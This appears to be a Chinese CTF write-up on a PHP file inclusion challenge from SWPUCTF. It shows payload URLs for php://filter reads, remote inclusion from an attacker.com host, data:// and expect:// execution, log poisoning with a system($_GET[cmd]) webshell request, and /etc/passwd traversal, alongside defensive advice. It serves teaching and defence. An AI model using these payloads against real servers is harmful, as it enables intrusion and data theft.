当前位置：首页 > article >正文

从一道SWPUCTF题复盘PHP文件包含漏洞：allow_url_include开启后，除了伪协议还能怎么玩？

article 2026/5/23 12:00:28

从SWPUCTF赛题探索PHP文件包含漏洞的深层攻防在CTF竞赛和实际渗透测试中PHP文件包含漏洞一直是Web安全领域的重要课题。这道来自SWPUCTF新生赛的题目看似简单却蕴含了丰富的攻防对抗思路。当allow_url_include配置被开启时攻击面会显著扩大远不止于常见的伪协议利用。1. 漏洞环境与基础利用分析题目给出的PHP脚本虽然简短但包含了几个关键安全配置?php ini_set(allow_url_include,on); header(Content-type: text/html; charsetutf-8); error_reporting(0); $file$_GET[file]; if(isset($file)){ show_source(__FILE__); echo flag 在flag.php中; }else{ echo 传入一个file试试; } include_once($file);这段代码中最危险的操作是直接使用include_once($file)且未对$file参数做任何过滤。更关键的是开发者通过ini_set临时开启了allow_url_include选项这为多种攻击方式打开了大门。1.1 基础伪协议利用最常见的解法是使用php://filter伪协议读取文件内容http://target.com/?filephp://filter/readconvert.base64-encode/resourceflag.php这种方式的原理是php://filter允许对数据流进行过滤处理convert.base64-encode将文件内容转换为Base64格式由于编码后的内容不是有效PHP代码因此不会被执行攻击者只需解码Base64即可获取原始文件内容典型过滤器组合过滤器类型作用示例convert.base64-encodeBase64编码readconvert.base64-encode/resourceflag.phpstring.rot13ROT13编码readstring.rot13/resourceflag.phpzlib.deflate压缩数据readzlib.deflate/resourceflag.php2. allow_url_include开启后的攻击面扩展当allow_url_includeOn时PHP允许包含远程文件这极大扩展了攻击可能性。以下是几种进阶利用方式2.1 远程文件包含(RFI)攻击者可以托管恶意PHP脚本然后通过URL包含执行http://target.com/?filehttp://attacker.com/shell.txt注意现代PHP默认配置会阻止包含带有HTTP/FTP协议的远程文件除非同时满足以下条件allow_url_fopenOnallow_url_includeOn远程服务器返回的文件扩展名在特定条件下可被解析为PHP2.2 data://协议利用data协议允许直接在URL中包含数据http://target.com/?filedata://text/plain,?php phpinfo();?或者使用Base64编码方式http://target.com/?filedata://text/plain;base64,PD9waHAgcGhwaW5mbygpOz82.3 expect://协议利用在特定环境下expect协议可以执行系统命令http://target.com/?fileexpect://ls不过这种利用方式需要满足PHP安装了expect扩展通常在生产环境中不常见3. 防御策略与安全编码实践针对文件包含漏洞开发者应采取多层次防御措施3.1 输入验证与过滤// 白名单方式验证包含文件 $allowed [header.php, footer.php]; $file $_GET[file]; if(in_array($file, $allowed)) { include($file); } else { die(Invalid file request); }3.2 安全配置建议在php.ini中设置allow_url_includeOff allow_url_fopenOff使用open_basedir限制文件访问范围保持PHP版本更新修复已知漏洞3.3 日志监控与异常检测建议监控以下异常行为包含操作中使用异常协议(php://, data://等)包含操作中尝试访问系统敏感文件(/etc/passwd等)短时间内大量包含操作尝试4. 实战中的高级利用技巧在真实渗透测试中文件包含漏洞往往需要结合其他技术实现更深层次的入侵。4.1 日志文件注入如果服务器权限配置不当可以通过包含日志文件(如access.log)实现代码执行发送包含PHP代码的请求GET /?php system($_GET[cmd]);? HTTP/1.1然后包含日志文件http://target.com/?file/var/log/apache2/access.log4.2 会话文件包含PHP会话文件(/tmp/sess_[id])有时包含用户可控数据可尝试注入http://target.com/?file/tmp/sess_abc1234.3 环境变量利用某些特殊环境变量可能包含用户可控数据http://target.com/?file/proc/self/environ5. 自动化检测与工具使用安全研究人员可以使用以下工具辅助检测文件包含漏洞常用工具对比工具名称类型特点Burp Suite商业强大的手动测试工具支持自定义扫描Wfuzz开源支持参数模糊测试可自定义字典LFI Suite开源专门针对LFI漏洞的测试工具典型测试Payload../../../../etc/passwd php://filter/convert.base64-encode/resourceindex.php data://text/plain,?php phpinfo();?在实际测试中建议先使用无害的包含测试(如包含自身)确认漏洞存在后再尝试敏感操作。

从一道SWPUCTF题复盘PHP文件包含漏洞：allow_url_include开启后，除了伪协议还能怎么玩？

相关文章：

从一道SWPUCTF题复盘PHP文件包含漏洞：allow_url_include开启后，除了伪协议还能怎么玩？

如何3分钟上手B站视频下载神器：BilibiliDown跨平台下载完全指南

3步搞定老iPhone降级：LeetDown让你的iPhone 5s/6焕发新生

小型团队如何利用Taotoken统一管理多模型API成本

别再乱用电容了！从稳压芯片电路入手，搞懂电解电容和贴片电容到底该怎么搭配

别再乱设边界了！HFSS中辐射边界(Radiation)与理想匹配层(PML)的实战对比与设置要点

Windows微信QQ防撤回终极指南：一键阻止消息被撤回的完整教程

ENSP实验避坑指南：搭建园区网时，VLAN间通信、MSTP负载分担、VRRP主备切换这些细节你配对了吗？

告别搜索不到设备！保姆级教程：在Windows上配置QT+MSVC开发BLE应用

C++ std::function：类型擦除与万能函数包装器实战指南

从任务栏消失到界面混乱：如何用ExplorerPatcher拯救你的Windows 11体验

极验三代w参数生成原理与逆向解析

Unity中PNG贴图内存暴增真相：ASTC压缩原理与工业级落地

Anthropic Zero Layer：大模型推理栈的原子化归一

Qt Widgets实战：用QCheckBox三态复选框搞定复杂表单选项（附QButtonGroup管理技巧）

从手机拍照到视频播放：一文看懂YUV(NV12/YUV444)格式为什么无处不在

OpCore Simplify：黑苹果OpenCore EFI自动化配置的智能解决方案

DownKyi完整教程：如何快速下载B站8K超高清视频的终极指南

基于YOLOv10的低延迟AI瞄准系统：多平台硬件加速与实时检测架构设计

VideoDownloadHelper专业视频下载解决方案：技术架构与实战指南

PaperXie 期刊论文写作全解析｜从选题到成稿，一键适配普通 / 核心 / SCI 期刊

TPT线下工作坊：AIGC、云原生与数据合规的深度实践与碰撞

学术创作提质增效：借助 paperxie 智能撰写工具搞定各层级期刊论文

终极Python SECS/GEM协议实现：5分钟构建半导体设备通信系统

用正点原子Nano开发板，5分钟搞定RT-Thread Nano的MDK5工程配置（附串口调试技巧）

从Hugging Face模型到可部署服务：我的fast-whisper中文识别项目踩坑与优化实录

TinyRS-R1：轻量级遥感视觉语言模型的技术解析与应用

终极指南：在Windows上完美使用苹果触控板的完整配置方案

基于AM62x核心板的微电网智能化改造：异构多核驱动与边缘计算实践

Desktop Postflop v0.2.7：高性能德州扑克GTO求解器架构设计与实现原理深度解析